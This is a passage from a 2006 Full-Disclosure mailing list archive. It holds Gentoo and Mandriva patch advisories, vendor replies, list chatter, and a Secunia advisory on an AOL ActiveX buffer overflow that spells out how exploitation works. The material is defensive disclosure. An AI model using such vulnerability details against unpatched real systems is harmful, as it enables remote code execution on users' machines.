========== [ 1 ] CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [ 2 ] CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [ 3 ] CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [ 4 ] CVE-2006-4343 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-11.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061212/def3a3a1/attachment.bin From asotirov at determina.com Tue Dec 12 00:20:43 2006 From: asotirov at determina.com (Alexander Sotirov) Date: Mon, 11 Dec 2006 16:20:43 -0800 Subject: [Full-disclosure] The newest Word flaw is due to malformed data structure handling In-Reply-To: <22313902.121061165874381032.JavaMail.juha-matti.laurio@netti.fi> References: <22313902.121061165874381032.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <457DF5DB.1090206@determina.com> Juha-Matti Laurio wrote: > Related to the newest MS Word 0-day > http://blogs.technet.com/msrc/archive/2006/12/10/new-report-of-a-word-zero-day.aspx > > US-CERT Vulnerability Note VU#166700 released today lists the following > new technical detail: > > "Microsoft Word fails to properly handle malformed data structures > allowing memory corruption to occur." > http://www.kb.cert.org/vuls/id/166700 I appreciate your efforts to keep the community informed, but these kinds of "technical details" are completely useless. It's not your fault, this has been a long-standing problem with the information from coming from the likes of CERT and MSRC. Almost all Office vulnerabilities (and security issues in file parsers in general) are a result of "malfromed data structures allowing memory corruption to occur". Repeating this statement for every Word bug doesn't tell us anything new. Descriptions of vulnerabilities, especially ones that are found in the wild, should include enough information to allow researchers to uniquely identify the new vulnerability and differentiate it from all other bugs, both known ones and 0days. Without that level of detail, you end up with this: http://www.securityfocus.com/archive/1/443288 Alex From security at mandriva.com Mon Dec 11 19:07:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Mon, 11 Dec 2006 12:07:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:227 ] - Updated kdegraphics packages fix EXIF vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:227 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kdegraphics Date : December 11, 2006 Affected: 2007.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Stack overflow in the KFILE JPEG (kfile_jpeg) plugin in kdegraphics3, as used by konqueror, digikam, and other KDE image browsers, allows remote attackers to cause a denial of service (stack consumption) via a crafted EXIF section in a JPEG file, which results in an infinite recursion. The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6297 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 6e89f3874a96540fa1d4031dcc37a17b 2007.0/i586/kdegraphics-3.5.4-7.1mdv2007.0.i586.rpm fd7cf5ecd552b43c4b05be3e275fbe9e 2007.0/i586/kdegraphics-common-3.5.4-7.1mdv2007.0.i586.rpm 1fdacd36d0c735b99de188b35262739a 2007.0/i586/kdegraphics-kcolorchooser-3.5.4-7.1mdv2007.0.i586.rpm 3810fcfd704c735fdb599d03ccbcf051 2007.0/i586/kdegraphics-kcoloredit-3.5.4-7.1mdv2007.0.i586.rpm 27d179e50c2a4181685df61b9d4831df 2007.0/i586/kdegraphics-kdvi-3.5.4-7.1mdv2007.0.i586.rpm 6ccd33d46c803152086e86efcb891421 2007.0/i586/kdegraphics-kfax-3.5.4-7.1mdv2007.0.i586.rpm 245d01f1f3202d7c15a076d2e0791abd 2007.0/i586/kdegraphics-kghostview-3.5.4-7.1mdv2007.0.i586.rpm 769d98df9e182b949a05120e94d4fbe1 2007.0/i586/kdegraphics-kiconedit-3.5.4-7.1mdv2007.0.i586.rpm cd41454a7f01fc9ade690a6382267927 2007.0/i586/kdegraphics-kolourpaint-3.5.4-7.1mdv2007.0.i586.rpm de89292ad4c14021c5ee348c21fac260 2007.0/i586/kdegraphics-kooka-3.5.4-7.1mdv2007.0.i586.rpm 9c3ff4d37861a31d585483fd6fa7ab26 2007.0/i586/kdegraphics-kpdf-3.5.4-7.1mdv2007.0.i586.rpm e7fb905b1acf999f25b1000f8cd3d6d6 2007.0/i586/kdegraphics-kpovmodeler-3.5.4-7.1mdv2007.0.i586.rpm fd4a51c696a549ca050104e279c65ca2 2007.0/i586/kdegraphics-kruler-3.5.4-7.1mdv2007.0.i586.rpm b3db1362303e456fcc34aee34e422614 2007.0/i586/kdegraphics-ksnapshot-3.5.4-7.1mdv2007.0.i586.rpm 4d9acb96ddd3f13f3ad5dea86601c595 2007.0/i586/kdegraphics-ksvg-3.5.4-7.1mdv2007.0.i586.rpm aad7047bd2c78070bd98a141144aa19b 2007.0/i586/kdegraphics-kuickshow-3.5.4-7.1mdv2007.0.i586.rpm a5183761af7d80c95901b08bc2254513 2007.0/i586/kdegraphics-kview-3.5.4-7.1mdv2007.0.i586.rpm d71c990067396203ebe90b15a890aaa0 2007.0/i586/kdegraphics-mrmlsearch-3.5.4-7.1mdv2007.0.i586.rpm ac22d45901705b7bea1c55c2dfafaf8d 2007.0/i586/libkdegraphics0-common-3.5.4-7.1mdv2007.0.i586.rpm 60e221b46f5af9d4d11de18e7470a777 2007.0/i586/libkdegraphics0-common-devel-3.5.4-7.1mdv2007.0.i586.rpm 0a42a68e4f7085e7b52b455d02d3e5fc 2007.0/i586/libkdegraphics0-kghostview-3.5.4-7.1mdv2007.0.i586.rpm c66f95121d95719b8929ea8383373a1a 2007.0/i586/libkdegraphics0-kghostview-devel-3.5.4-7.1mdv2007.0.i586.rpm af3eb8e08afb4e93713f69be96e3a429 2007.0/i586/libkdegraphics0-kooka-3.5.4-7.1mdv2007.0.i586.rpm d9142070b0b91c15749e8fd9252c3db0 2007.0/i586/libkdegraphics0-kooka-devel-3.5.4-7.1mdv2007.0.i586.rpm aebc94e07a8a77c3a99ad3a22bef8246 2007.0/i586/libkdegraphics0-kpovmodeler-3.5.4-7.1mdv2007.0.i586.rpm 7619c56e202bca1e34b28867dc0ad0e8 2007.0/i586/libkdegraphics0-kpovmodeler-devel-3.5.4-7.1mdv2007.0.i586.rpm b0395010aa1c01d1001c9543d5f17911 2007.0/i586/libkdegraphics0-ksvg-3.5.4-7.1mdv2007.0.i586.rpm 8ce4847dd75c97724a979299947948bf 2007.0/i586/libkdegraphics0-ksvg-devel-3.5.4-7.1mdv2007.0.i586.rpm bbff80ead5c4dca8723c4c6369303d54 2007.0/i586/libkdegraphics0-kview-3.5.4-7.1mdv2007.0.i586.rpm 6be2fed4e62ac8a1539eea25fb208edc 2007.0/i586/libkdegraphics0-kview-devel-3.5.4-7.1mdv2007.0.i586.rpm c35cf358df91e4d224a684d63b69c4f3 2007.0/SRPMS/kdegraphics-3.5.4-7.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: e79cfa9037fd4c26a5b79217a3d79497 2007.0/x86_64/kdegraphics-3.5.4-7.1mdv2007.0.x86_64.rpm 87b00c4fd7fbbac63ed82077caacd2cb 2007.0/x86_64/kdegraphics-common-3.5.4-7.1mdv2007.0.x86_64.rpm 6436ecb6465173e4c06f5f1c296ccbe9 2007.0/x86_64/kdegraphics-kcolorchooser-3.5.4-7.1mdv2007.0.x86_64.rpm a01eb9cc427030f253a40a53e9d84d2c 2007.0/x86_64/kdegraphics-kcoloredit-3.5.4-7.1mdv2007.0.x86_64.rpm ec5ddf068cdbb6616ea05c714958e1ea 2007.0/x86_64/kdegraphics-kdvi-3.5.4-7.1mdv2007.0.x86_64.rpm f1b9e09ad9e0cb6a9307dcf9241994b8 2007.0/x86_64/kdegraphics-kfax-3.5.4-7.1mdv2007.0.x86_64.rpm 74ea3d6f6650a01c5cb424b2926b16cb 2007.0/x86_64/kdegraphics-kghostview-3.5.4-7.1mdv2007.0.x86_64.rpm 415180a978a851df625224cdd7c13f77 2007.0/x86_64/kdegraphics-kiconedit-3.5.4-7.1mdv2007.0.x86_64.rpm 88c511450eaaeba69bdf510e277fc4e7 2007.0/x86_64/kdegraphics-kolourpaint-3.5.4-7.1mdv2007.0.x86_64.rpm 230e339f6b524c7c8f93a7a86a3fe30e 2007.0/x86_64/kdegraphics-kooka-3.5.4-7.1mdv2007.0.x86_64.rpm 7e765122e5473f9750a13c2a89f70df1 2007.0/x86_64/kdegraphics-kpdf-3.5.4-7.1mdv2007.0.x86_64.rpm eb721c17dc6f8dffbf8c3e8ab6dfae0a 2007.0/x86_64/kdegraphics-kpovmodeler-3.5.4-7.1mdv2007.0.x86_64.rpm 236129966f43709d4ae891f4c912d62c 2007.0/x86_64/kdegraphics-kruler-3.5.4-7.1mdv2007.0.x86_64.rpm f2826041cde62e9a4f64d08d97dfee10 2007.0/x86_64/kdegraphics-ksnapshot-3.5.4-7.1mdv2007.0.x86_64.rpm 4a7ec071aa6fbdf97d5909657580edf1 2007.0/x86_64/kdegraphics-ksvg-3.5.4-7.1mdv2007.0.x86_64.rpm b578717af98f91c6cf025273a409ac8d 2007.0/x86_64/kdegraphics-kuickshow-3.5.4-7.1mdv2007.0.x86_64.rpm 7b62ddadb8cd518d5e8e60b7b5e14ce2 2007.0/x86_64/kdegraphics-kview-3.5.4-7.1mdv2007.0.x86_64.rpm 0b22ef36963b31051dd29d6659a9c7b9 2007.0/x86_64/kdegraphics-mrmlsearch-3.5.4-7.1mdv2007.0.x86_64.rpm d2b5df8246590f1af9958094ccf160d7 2007.0/x86_64/lib64kdegraphics0-common-3.5.4-7.1mdv2007.0.x86_64.rpm f940f76bd3f6d8a2ed4623f1f4320119 2007.0/x86_64/lib64kdegraphics0-common-devel-3.5.4-7.1mdv2007.0.x86_64.rpm b5ee5fd8c6e32a366874f9751f41d87b 2007.0/x86_64/lib64kdegraphics0-kghostview-3.5.4-7.1mdv2007.0.x86_64.rpm 9271721cc1fb1a62f54e46a4d0ff359c 2007.0/x86_64/lib64kdegraphics0-kghostview-devel-3.5.4-7.1mdv2007.0.x86_64.rpm 679c511a383bcf6f49000b298a1bc284 2007.0/x86_64/lib64kdegraphics0-kooka-3.5.4-7.1mdv2007.0.x86_64.rpm 75ca0c4062caabc331d67ea677c616ee 2007.0/x86_64/lib64kdegraphics0-kooka-devel-3.5.4-7.1mdv2007.0.x86_64.rpm 24e3dafdb8cf72305f3fc6232722d557 2007.0/x86_64/lib64kdegraphics0-kpovmodeler-3.5.4-7.1mdv2007.0.x86_64.rpm 5122b14c05d93aa5ae1b8184a6ec5680 2007.0/x86_64/lib64kdegraphics0-kpovmodeler-devel-3.5.4-7.1mdv2007.0.x86_64.rpm 9af5412789b2686795cb70227101c576 2007.0/x86_64/lib64kdegraphics0-ksvg-3.5.4-7.1mdv2007.0.x86_64.rpm fa830aeb8ef9cee113fc411a8420b461 2007.0/x86_64/lib64kdegraphics0-ksvg-devel-3.5.4-7.1mdv2007.0.x86_64.rpm 0255428daec795631f0cbe2e7288262d 2007.0/x86_64/lib64kdegraphics0-kview-3.5.4-7.1mdv2007.0.x86_64.rpm 5b35c10c58b1434cd1a8bc0e252580a0 2007.0/x86_64/lib64kdegraphics0-kview-devel-3.5.4-7.1mdv2007.0.x86_64.rpm c35cf358df91e4d224a684d63b69c4f3 2007.0/SRPMS/kdegraphics-3.5.4-7.1mdv2007.0.src.rpm Corporate 3.0: 2fc94fe9cb1603d382452210242e7d77 corporate/3.0/i586/kdegraphics-3.2-15.13.C30mdk.i586.rpm 25f3a02decd96f02979b6e9d5dfb5b21 corporate/3.0/i586/kdegraphics-common-3.2-15.13.C30mdk.i586.rpm ffca8e258ced134c3d5b209bd361d390 corporate/3.0/i586/kdegraphics-kdvi-3.2-15.13.C30mdk.i586.rpm 35e9d39b5bb214090f24137092d997c3 corporate/3.0/i586/kdegraphics-kfax-3.2-15.13.C30mdk.i586.rpm 29b648144b6811a07f4c76837be95f32 corporate/3.0/i586/kdegraphics-kghostview-3.2-15.13.C30mdk.i586.rpm 130e18e47bffccd5abdd44b08d0eb3f4 corporate/3.0/i586/kdegraphics-kiconedit-3.2-15.13.C30mdk.i586.rpm 090e96550a552c714e05d807a9af3b55 corporate/3.0/i586/kdegraphics-kooka-3.2-15.13.C30mdk.i586.rpm 6f49e3dad0a816fbbe53e72bdfaccc94 corporate/3.0/i586/kdegraphics-kpaint-3.2-15.13.C30mdk.i586.rpm ebf5f34644cb198cb2f2f20d1fb09308 corporate/3.0/i586/kdegraphics-kpdf-3.2-15.13.C30mdk.i586.rpm 88347612742492086ae2a06294a42d0a corporate/3.0/i586/kdegraphics-kpovmodeler-3.2-15.13.C30mdk.i586.rpm 80de2293b4e7c0a9ae849b175b391198 corporate/3.0/i586/kdegraphics-kruler-3.2-15.13.C30mdk.i586.rpm 3641f635fd16be1c464f89efadca7b09 corporate/3.0/i586/kdegraphics-ksnapshot-3.2-15.13.C30mdk.i586.rpm 634a386d2ac542dcbc2da7fb06726733 corporate/3.0/i586/kdegraphics-ksvg-3.2-15.13.C30mdk.i586.rpm 31179f3561568e582e3fef1ec551cdcb corporate/3.0/i586/kdegraphics-kuickshow-3.2-15.13.C30mdk.i586.rpm ebf206a03879f0cf7dacf606f870da16 corporate/3.0/i586/kdegraphics-kview-3.2-15.13.C30mdk.i586.rpm 15fb87595432138f486bd78b2da41a49 corporate/3.0/i586/kdegraphics-mrmlsearch-3.2-15.13.C30mdk.i586.rpm 34e6718386e6e6e57e80fb1096f843f8 corporate/3.0/i586/libkdegraphics0-common-3.2-15.13.C30mdk.i586.rpm c3a1a3e06996647838452c428bb557f2 corporate/3.0/i586/libkdegraphics0-common-devel-3.2-15.13.C30mdk.i586.rpm dbc772da3012bf55d2f1939f66ae5af6 corporate/3.0/i586/libkdegraphics0-kooka-3.2-15.13.C30mdk.i586.rpm 829beca412e89f2afef07504cfc32a3d corporate/3.0/i586/libkdegraphics0-kooka-devel-3.2-15.13.C30mdk.i586.rpm c616454fded8ae32ed7c30b713763b7d corporate/3.0/i586/libkdegraphics0-kpovmodeler-3.2-15.13.C30mdk.i586.rpm 4fc6d8b358f75c67e67f454c479a3db7 corporate/3.0/i586/libkdegraphics0-kpovmodeler-devel-3.2-15.13.C30mdk.i586.rpm 418b0e06965439536f57c3aa65461a33 corporate/3.0/i586/libkdegraphics0-ksvg-3.2-15.13.C30mdk.i586.rpm 8254f0ed01d54eec133b863f860d2fb3 corporate/3.0/i586/libkdegraphics0-ksvg-devel-3.2-15.13.C30mdk.i586.rpm f1f70eb5c715d9b430474dab0047ca84 corporate/3.0/i586/libkdegraphics0-kuickshow-3.2-15.13.C30mdk.i586.rpm a40e3ba70707158be862d3eeb7ebc1ad corporate/3.0/i586/libkdegraphics0-kview-3.2-15.13.C30mdk.i586.rpm 34b573701e057adf47be21c8c26a77bf corporate/3.0/i586/libkdegraphics0-kview-devel-3.2-15.13.C30mdk.i586.rpm 82af2d9ecd3c94bb2bb9bb384e363175 corporate/3.0/i586/libkdegraphics0-mrmlsearch-3.2-15.13.C30mdk.i586.rpm 118616d1fbbc2a288b0c845b530ab5ba corporate/3.0/SRPMS/kdegraphics-3.2-15.13.C30mdk.src.rpm Corporate 3.0/X86_64: e56f8e1452788a6682c63bf12d89c4dc corporate/3.0/x86_64/kdegraphics-3.2-15.13.C30mdk.x86_64.rpm ea747244ce018b9f7f0fe9e7acda73a2 corporate/3.0/x86_64/kdegraphics-common-3.2-15.13.C30mdk.x86_64.rpm 43f7612469f0530dca0ea13735d7fb21 corporate/3.0/x86_64/kdegraphics-kdvi-3.2-15.13.C30mdk.x86_64.rpm ce8dccbcf4db264f3dab9bf12e876506 corporate/3.0/x86_64/kdegraphics-kfax-3.2-15.13.C30mdk.x86_64.rpm 605b6cd01214f45dd9472765acd69f1e corporate/3.0/x86_64/kdegraphics-kghostview-3.2-15.13.C30mdk.x86_64.rpm 14eec91200f15fceaf0a7f6e62cb2e52 corporate/3.0/x86_64/kdegraphics-kiconedit-3.2-15.13.C30mdk.x86_64.rpm a481acd62448ca88e0826d3566609f98 corporate/3.0/x86_64/kdegraphics-kooka-3.2-15.13.C30mdk.x86_64.rpm 3ceb16e8055e9777fd38c91f3e11706a corporate/3.0/x86_64/kdegraphics-kpaint-3.2-15.13.C30mdk.x86_64.rpm c0c2e035673223cd8602a0838b0598fb corporate/3.0/x86_64/kdegraphics-kpdf-3.2-15.13.C30mdk.x86_64.rpm df8c5c7111271082ad50fca8ffdf055d corporate/3.0/x86_64/kdegraphics-kpovmodeler-3.2-15.13.C30mdk.x86_64.rpm 79e3e14d8dd7fa7e6349e97f1d9d7b5a corporate/3.0/x86_64/kdegraphics-kruler-3.2-15.13.C30mdk.x86_64.rpm c09dec0e9b5df4f3d2a2f69cd72c77f2 corporate/3.0/x86_64/kdegraphics-ksnapshot-3.2-15.13.C30mdk.x86_64.rpm 7758c9ebab956ac41e9f3a2d2a6c8a7c corporate/3.0/x86_64/kdegraphics-ksvg-3.2-15.13.C30mdk.x86_64.rpm 702873b7683ebd5043bba05d38a93656 corporate/3.0/x86_64/kdegraphics-kuickshow-3.2-15.13.C30mdk.x86_64.rpm ac5a46b1098454f4489496e4166c8b5f corporate/3.0/x86_64/kdegraphics-kview-3.2-15.13.C30mdk.x86_64.rpm 56150fe2c88109c86bead8cf09ba04ac corporate/3.0/x86_64/kdegraphics-mrmlsearch-3.2-15.13.C30mdk.x86_64.rpm 8f3a68bb43ef4525eb8c3a6e6117a182 corporate/3.0/x86_64/lib64kdegraphics0-common-3.2-15.13.C30mdk.x86_64.rpm 534eb8871b8983f86d8e63d46df30e10 corporate/3.0/x86_64/lib64kdegraphics0-common-devel-3.2-15.13.C30mdk.x86_64.rpm cd981a050f0e0c6ae91acced2e52394b corporate/3.0/x86_64/lib64kdegraphics0-kooka-3.2-15.13.C30mdk.x86_64.rpm c1d1f2d8bcae49bedf6646798cb29453 corporate/3.0/x86_64/lib64kdegraphics0-kooka-devel-3.2-15.13.C30mdk.x86_64.rpm 4aa97e98fa26ddf8ef93f1fd4d1c22e2 corporate/3.0/x86_64/lib64kdegraphics0-kpovmodeler-3.2-15.13.C30mdk.x86_64.rpm 31702c7761c465b7d78177c865fcef2b corporate/3.0/x86_64/lib64kdegraphics0-kpovmodeler-devel-3.2-15.13.C30mdk.x86_64.rpm 4b50916440138d3ad18af03515eebdf5 corporate/3.0/x86_64/lib64kdegraphics0-ksvg-3.2-15.13.C30mdk.x86_64.rpm f3be5478fcba1b48a41645859b65b373 corporate/3.0/x86_64/lib64kdegraphics0-ksvg-devel-3.2-15.13.C30mdk.x86_64.rpm 6a2d1c240d284bc741f72a283c990062 corporate/3.0/x86_64/lib64kdegraphics0-kuickshow-3.2-15.13.C30mdk.x86_64.rpm 7590b48293cf62557ff41d1a53896357 corporate/3.0/x86_64/lib64kdegraphics0-kview-3.2-15.13.C30mdk.x86_64.rpm d39a534a98bc5751f6bcc0d1af3ae408 corporate/3.0/x86_64/lib64kdegraphics0-kview-devel-3.2-15.13.C30mdk.x86_64.rpm c5f531f3c2798796b7fe5261c1af3c56 corporate/3.0/x86_64/lib64kdegraphics0-mrmlsearch-3.2-15.13.C30mdk.x86_64.rpm 118616d1fbbc2a288b0c845b530ab5ba corporate/3.0/SRPMS/kdegraphics-3.2-15.13.C30mdk.src.rpm Corporate 4.0: 400b776273133c15a27b3cd0bc7d492a corporate/4.0/i586/libkdegraphics0-kooka-3.5.4-0.2.20060mlcs4.i586.rpm 43c5da552e05179a7065f19f6153dc21 corporate/4.0/i586/libkdegraphics0-kooka-devel-3.5.4-0.2.20060mlcs4.i586.rpm fdcff6a1e1770cc4eac9e25028bd427e corporate/4.0/SRPMS/kdegraphics-3.5.4-0.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 0d9fe775f62e6cd137875c52a24b5999 corporate/4.0/x86_64/lib64kdegraphics0-kooka-3.5.4-0.2.20060mlcs4.x86_64.rpm 89ac83dc22519c9dc7d2729251dc90c1 corporate/4.0/x86_64/lib64kdegraphics0-kooka-devel-3.5.4-0.2.20060mlcs4.x86_64.rpm fdcff6a1e1770cc4eac9e25028bd427e corporate/4.0/SRPMS/kdegraphics-3.5.4-0.2.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFfYCCmqjQ0CJFipgRAqW6AKCHKd4zvoi9MG19M4OxqHjS8rp+7gCgpe3y v/MH2AeKoaHaa/pOOkrTlig= =eQAa -----END PGP SIGNATURE----- From davek_throwaway at hotmail.com Mon Dec 11 19:52:18 2006 From: davek_throwaway at hotmail.com (Dave "No, not that one" Korn) Date: Mon, 11 Dec 2006 19:52:18 -0000 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack References: <200612011515526141632399@mail.smumn.edu><5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> Message-ID: TheGesus wrote: > I was only quoting (with a little creative editing) the late(?), > great(?) Paul Milne of Y2K disaster fame. Fair enough, in that case, Paul Milne is MAKING IT HAPPEN! You're kinda-helping by propagating his sewage without a proper health warning though; your argument is a bit like the line of thinking that says "I know that all those email virus warnings are always hoaxes, but I'll send this one on to all my friends just in case this is the one time that it isn't...." > There's a goldmine in there... Wow, a whole new world of net.kookery that I've never explored... thanks for the amusing reading material. > > http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+panic+author%3Apaul+milne&safe=off&qt_s=Search > > "If you live within 5 miles of a 7-11, you're toast" Heh, I couldn't resist sorting by date... seems the last time he ever poasted to usenut was 5th december 2000.... only took him 12 months to get how wrong he was but he did at least disappear in shame! cheers, DaveK -- Can't think of a witty .sigline today.... From James.Williams at ca.com Mon Dec 11 21:29:39 2006 From: James.Williams at ca.com (Williams, James K) Date: Mon, 11 Dec 2006 16:29:39 -0500 Subject: [Full-disclosure] LS-20061001 - Computer Associates BrightStor ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability Message-ID: <649CDCB56C88AA458EFF2CBF494B620401D65FB9@USILMS12.ca.com> > [Full-disclosure] LS-20061001 - Computer Associates BrightStor > ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability > advisories at lssec.com advisories at lssec.com > Fri Dec 8 21:40:47 GMT 2006 > > LS-20061001 > [...] > > Technical details: > > http://www.lssec.com/advisories.html > > LSsecurity - LSsec.com CA is aware of this report. We urge customers running BrightStor ARCserve Backup r11.5 to install SP2. Regards, Ken Ken Williams ; 0xE2941985 Director, CA Vulnerability Research From James.Williams at ca.com Mon Dec 11 21:27:51 2006 From: James.Williams at ca.com (Williams, James K) Date: Mon, 11 Dec 2006 16:27:51 -0500 Subject: [Full-disclosure] LS-20060908 - Computer Associates BrightStor ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability Message-ID: <649CDCB56C88AA458EFF2CBF494B620401D65FB4@USILMS12.ca.com> > [Full-disclosure] LS-20060908 - Computer Associates BrightStor > ARCserve Backup v11.5 Remote Buffer Overflow Vulnerability > advisories at lssec.com advisories at lssec.com > Fri Dec 8 21:39:31 GMT 2006 > > LS-20060908 > [...] > > Technical details: > > http://www.lssec.com/advisories.html > > LSsecurity - LSsec.com CA is aware of this report. We urge customers running BrightStor ARCserve Backup r11.5 to install SP2. Regards, Ken Ken Williams ; 0xE2941985 Director, CA Vulnerability Research From vorlon at gentoo.org Mon Dec 11 21:46:21 2006 From: vorlon at gentoo.org (Matthias Geerdsen) Date: Mon, 11 Dec 2006 22:46:21 +0100 Subject: [Full-disclosure] [ GLSA 200612-10 ] Tar: Directory traversal vulnerability Message-ID: <457DD1AD.9090904@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Tar: Directory traversal vulnerability Date: December 11, 2006 Bugs: #155901 ID: 200612-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Tar is vulnerable to directory traversal possibly allowing for the overwriting of arbitrary files. Background ========== The Tar program provides the ability to create and manipulate tar archives. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-arch/tar < 1.16-r2 >= 1.16-r2 Description =========== Tar does not properly extract archive elements using the GNUTYPE_NAMES record name, allowing files to be created at arbitrary locations using symlinks. Once a symlink is extracted, files after the symlink in the archive will be extracted to the destination of the symlink. Impact ====== An attacker could entice a user to extract a specially crafted tar archive, possibly allowing for the overwriting of arbitrary files on the system extracting the archive. Workaround ========== There is no known workaround at this time. Resolution ========== All Tar users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-arch/tar-1.16-r2" References ========== [ 1 ] CVE-2006-6097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-10.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 189 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061211/5ac2a4ff/attachment.bin From zdi-disclosures at 3com.com Tue Dec 12 08:22:04 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 12 Dec 2006 00:22:04 -0800 Subject: [Full-disclosure] Secunia Research: AOL CDDBControl ActiveX Control "SetClientInfo()" Buffer Overflow In-Reply-To: <1165831784.2682.238.camel@ts4.intnet> Message-ID: This issue was previously discovered and disclosed in June of this year: http://www.zerodayinitiative.com/advisories/ZDI-06-019.html CVE-2006-3134 AOL was notified during the original disclosure process by the affected vendor, GraceNote, at that time. Secunia Research Sent by: full-disclosure-bounces at lists.grok.org.uk 12/11/2006 02:09 AM Please respond to remove-vuln at secunia.com To full-disclosure at lists.grok.org.uk cc Subject [Full-disclosure] Secunia Research: AOL CDDBControl ActiveX Control "SetClientInfo()" Buffer Overflow ====================================================================== Secunia Research 08/12/2006 - AOL CDDBControl ActiveX Control "SetClientInfo()" Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 Vendor Statement.....................................................8 References...........................................................9 About Secunia.......................................................10 Verification........................................................11 ====================================================================== 1) Affected Software - America Online 7.0 revision 4114.563 - AOL 8.0 revision 4129.230 - AOL 9.0 Security Edition revision 4156.910 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software Product Link: http://downloads.channel.aol.com/windowsproducts ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in AOL, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the "CDDBControlAOL.CDDBAOLControl" ActiveX control (cddbcontrol.dll) when processing "ClientId" arguments passed to the "SetClientInfo()" method. This can be exploited to cause a stack-based buffer overflow by passing an overly long string (more than 256 bytes). Successful exploitation allows execution of arbitrary code when a user visits a malicious website with Internet Explorer. In order to exploit the vulnerability, a certain registry value has to be set to "1111". This is not set by default, but can be set up automatically by first instantiating the bundled CerberusCDPlayer ActiveX control. ====================================================================== 5) Solution Updates are automatically available for AOL 9.x users when logging into the AOL service. ====================================================================== 6) Time Table 23/11/2006 - Vendor notified. 24/11/2006 - Provided additional information to the vendor. 24/11/2006 - Vendor response. 08/12/2006 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) Vendor Statement Overview AOL has recently been made aware of a security vulnerability present in the AOL CDDB ActiveX control. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary code on a vulnerable system. Affected Products and Applications All AOL software versions are affected by this issue. Solutions 1. Users of AOL 9.0 or AOL 9.0 Security Edition are recommended to log in to the AOL service and a fix will be seamlessly applied to their system. 2. Users using versions of AOL that are older than 9.0 are strongly recommended to upgrade to the latest version of AOL 9.0 Security Edition. Acknowledgements AOL would like to thank Secunia for their efforts in 